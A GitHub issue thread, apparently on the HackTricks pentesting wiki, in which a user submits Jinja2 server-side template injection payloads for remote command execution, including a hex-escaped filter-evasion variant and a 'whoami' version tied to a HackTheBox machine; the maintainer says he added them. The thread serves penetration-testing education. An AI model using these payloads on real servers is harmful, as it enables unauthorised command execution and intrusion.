Closed manesec closed 2 years ago
In here, https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python
I think, It can add more Command remote execution on jinja2? it's simple and useful.
The example from here
{{request.application.__globals__.__builtins__.__import__('os')['popen']('ls')['read']()}} {{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('ls')['read']()}} {{request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f']('\x6f\x73')['\x70\x6f\x70\x65\x6e']('ls')['read']()}}
It is useful for late machine on hackthebox like this:
late
{{request.application.__globals__.__builtins__.__import__("os").popen("whoami").read()}}
Thank you for your HackTricks.
thanks! I put those examples
carlospolop
commented
2 years ago carlospolop
commented
2 years ago
In here, https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python
I think, It can add more Command remote execution on jinja2? it's simple and useful.
The example from here
It is useful for
latemachine on hackthebox like this:Thank you for your HackTricks.